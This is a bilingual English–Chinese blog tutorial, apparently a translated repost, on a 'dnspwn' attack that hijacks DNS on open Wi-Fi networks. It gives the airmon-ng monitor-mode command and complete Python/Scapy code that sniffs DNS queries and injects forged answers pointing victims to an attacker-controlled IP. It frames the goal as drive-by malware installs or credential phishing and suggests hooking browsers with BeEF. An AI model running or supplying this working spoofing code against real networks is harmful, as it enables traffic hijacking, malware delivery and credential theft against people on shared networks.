使用Python进行无线攻击:第一部分 – “Dnspwn攻击”(Wireless Attacks With Python: Part One – the “Dnspwn Attack”)

By | 2018年7月13日

Introduction

A while back, I published a post on the Raidersec blog demonstrating how to perform a deauthentication attack using Python and Scapy. I enjoyed writing the post, since I got the opportunity to learn in-depth about how different wireless attacks work, beyond just learning how to exclusively use the aircrack suite.

So, with that being said, this post will kick off a short series of posts discussing how to perform common wireless attacks using Python. I hope you enjoy the posts and, as always, never hesitate to let me know if you have any comments or questions below.

引言

前不久,我在Raidersec博客上发布了一篇博客文章,介绍了如何利用Python和Scapy实现绕过鉴权的攻击。我非常高兴写出这篇文章,因为这么做我不仅了解了如何使用aircrack套件,还有机会深度地了解无线攻击运作方式有什么不同。

因此,正如文中所说,这篇博客文章将引出一系列讨论如何利用Python实现普通的无线攻击的短小精悍的博客文章。像以往一样,我希望你欣赏这篇文章,而且毫不犹豫地让我们知道你是否也有如下的评论或者问题。

The “Dnspwn Attack”

The first attack we’ll explore is what I call the “dnspwn attack” (since, from what I can tell, this attack was first created targeting HTTP with the “airpwn” tool, and later extended to DNS) The idea behind the attack is pretty simple:

Consider two people on the same open WLAN: Bob and Eve. Eve wants to get Bob to visit a malicious webpage she created so that she can install malware onto Bob’s computer via a drive-by download, or perhaps show a spoofed website to try and steal Bob’s credentials.

"Dnspwn攻击"

我们将要进行的第一个攻击我称之为"dnspwn攻击"。(因为,在我看来,这种攻击首先使用"airpwn"工具创建了目标HTTP,然后对DNS进行攻击。)
这种攻击的思想非常简单:

假设在一个开放的WLAN上有两个人:Bob和Eve。Eve想让Bob访问她创建的恶意网页,这样她就可以通过隐藏性的下载给Bob的计算机上安装恶意软件,或者可能展示一个欺骗性的站点来试图窃取Bob的认证信息。

To do this, she remembers that she can sniff all requests coming to and from Bob’s computer. She also knows that she is closer to Bob than the web server he is sending a request to. So, she decides to wait until Bob sends a web request, and see if she can send back a spoofed response pretending to come from the web server before the actual web server can respond. Turns out, she can. In fact, once the spoofed response is received, Bob’s computer will likely ignore any further traffic received, including the real response!

Let’s see what this would look like:

So, now that we know how the attack works, let’s automate it!

为了实现这种攻击,她记得她可侦听到所有从Bob计算机发出或者到达Bob计算机的请求。她还知道她比Bob正在请求的Web服务器离Bob更近。因此,她决定等待Bob发送Web请求,而且看看她是否能够在真正的Web服务器响应之前回送一个欺骗性的响应,以假装这个响应来自于web服务器。事实证明,她可以做到。实际上,一旦接收了欺骗性的响应,Bob的计算机可能将忽略任何后续接收到的信息,包括真正的响应。

让我们看一下这一些发生的过程,看起来如下:

因此,既然我们已经知道这种攻击如何运行的了,那么让我们把这种攻击自动化。

Setting up the Alfa AWUS06H

As was the case in my Raidersec post, we will be using the handy Alfa AWUS036H for this attack. The first thing we want to do is to put our wireless card in monitor mode so that we can capture all traffic coming from thedemo_insecurenetwork.

root@bt:~# airmon-ng start wlan0

Now that we have monitor mode up and running onmon0, let’s start coding!

设置Alfa AWUS06H无线网卡

就像我在Raidersec博客文章里的哪个例子,我们将使用手边的Alfa AWUS036H实现这次攻击。我们需要做的第一件事情就是设置无线网卡在监控模式下,这样我们就可以捕获所有来自于演示性的不安全网络的信息流。

root@bt:~# airmon-ng start wlan0

既然我们已经启动了监控模式,并运行在mon0接口上,那么让我们开始编写代码吧!

Coding the Attack

We will utilize thescapymodule to perform the attack. Let’s start by sniffing any UDP packet with a destination of port 53, and send the packet to a function calledsend_responsethat we will make later:

from scapy.all import *

sniff(prn=lambda x: send_response(x),
  lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)

Now let’s create a function which can parse the request for relevant information, and inject the response. We can parse the packet and create our response simply by working our way up the layers as follows:

  • 802.11 Frame – Change the “to-ds” flag to “from-ds” (our request will now be coming from the access point)
  • 802.11 Frame – Switch the source and destination MAC addresses
  • IP Layer – Switch the source and destination IP addresses
  • UDP layer – Switch the source and destination ports
  • DNS layer – Set the “answer” flag(s), and append our spoofed answer

编写攻击代码

我们将利用scapy模块实现这种攻击。我们开始先侦听目的端口为53的任何UDP包,然后发送这个包给我们后面将要编写名字为send_response的函数:

from scapy.all import *

sniff(prn=lambda x: send_response(x),
  lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)

现在,让我们创建一个可以解析请求中相关信息并注入应答的函数。我们只是通过如下逐层上移的方式解析包并创建响应:

  • 802.11帧-更改"to-ds"标记为"from-ds"(现在我们的请求将成为来自于访问点)
  • 802.11帧-交换源MAC地址和目的MAC地址
  • IP层-交换源IP地址和目的IP地址
  • UDP层-交换源端口和目的端口
  • DNS层-设置"answer"标记,添加欺骗性

Fortunately,scapymakes this very simple for us by abstracting away a lot of minor details (e.g. in fact, there are
4 MAC address fields in an 802.11 frame, each in a different order depending on the direction of the packet). With that being said, here’s the code:

def send_response(x):
  # Get the requested domain
  req_domain = x[DNS].qd.qname
  spoofed_ip = '192.168.2.1'
  # Let's build our response from a copy of the original packet
  response = x.copy()
  # We need to start by changing our response to be "from-ds", or from the access point.
  response.FCfield = 2L
  # Switch the MAC addresses
  response.addr1, response.addr2 = x.addr2, x.addr1
  # Switch the IP addresses
  response.src, response.dst = x.dst, x.src
  # Switch the ports
  response.sport, response.dport = x.dport, x.sport
  # Set the DNS flags
  response[DNS].qr = 1L
  response[DNS].ra = 1L
  response[DNS].ancount = 1

Now that we’ve set all the flags, let’s create and append the DNS answer:

response[DNS].an = DNSRR(
  rrname = req_domain,
  type = 'A',
  rclass = 'IN',
  ttl = 900,
  rdata = spoofed_ip
  )

And, finally, we inject the spoofed response:

sendp(response)

That’s all there is to it! You can find the full source on
Github.

幸运的是,通过抽象掉许多次要细节,scapy使这个变得相当轻松(例如,在一个802.11帧中,实际上具有4个MAC地址字段,根据包的方向,每一种都有不同的顺序)。如上所述,代码如下:

def send_response(x):
  # Get the requested domain
  req_domain = x[DNS].qd.qname
  spoofed_ip = '192.168.2.1'
  # Let's build our response from a copy of the original packet
  response = x.copy()
  # We need to start by changing our response to be "from-ds", or from the access point.
  response.FCfield = 2L
  # Switch the MAC addresses
  response.addr1, response.addr2 = x.addr2, x.addr1
  # Switch the IP addresses
  response.src, response.dst = x.dst, x.src
  # Switch the ports
  response.sport, response.dport = x.dport, x.sport
  # Set the DNS flags
  response[DNS].qr = 1L
  response[DNS].ra = 1L
  response[DNS].ancount = 1

现在设置了所有的标志,我们再创建添加上 DNS 应答:

response[DNS].an = DNSRR(
  rrname = req_domain,
  type = 'A',
  rclass = 'IN',
  ttl = 900,
  rdata = spoofed_ip
  )

最终,我们注入此欺骗响应:

sendp(response)

这就是全部了!你可以在
Github上找到所有源代码。

Demo

For the demo, I have the following HTML response available on the host 192.168.2.138:

<html>
<head></head>
<body>
  Owned.
</body>
</html>

It’s worth noticing that we can have
any HTML, Javascript, etc. we want. It would be trivial to hook the browser using the
BeEF framework, for example.

Here’s a screenshot of it in action (I am using my iPhone as the victim):

演示

对于这个演示,我有如下来自主机192.168.2.138的HTML响应:

<html>
<head></head>
<body>
  Owned.
</body>
</html>

值得注意的是,我们可以加上任何我们想要的HTML,Javascript,等等。举个例子,用BeEF 框架 来劫持浏览器是小菜一碟。

下面是处于攻击中的截图(我是用我的iPhone来做被攻击方):

Conclusion & Future Improvements

It’s important to note that this attack will work just as well on other simple request/response protocols. For example, the original “airpwn” attack spoofed HTTP responses. There are also quite a few improvements we can make to this script. Here are a few:

  • Match requests against regular expressions (for example, only replacing Javascript content)
  • Set options from arguments / Read configuration information from a file
  • Implement the attack for other protocols (ie HTTP).

Enjoy!

Jordan

总结 & 将来的改进

注意这个攻击方法对于其他简单的请求/响应协议也同样有效。例如,原始的“airpwn”攻击欺骗了HTTP响应。对于这个脚本,我们还可以进一步做一些改进和提高。下面就是其中的几个方面:

  • 通过正则表达式来匹配请求(例如,仅仅替换Javascript的内容)
  • 通过参数设置选项/从文件中读取配置信息
  • 实现其他协议的攻击(如HTTP)。

Enjoy!

Jordan

发表评论

电子邮件地址不会被公开。 必填项已用*标注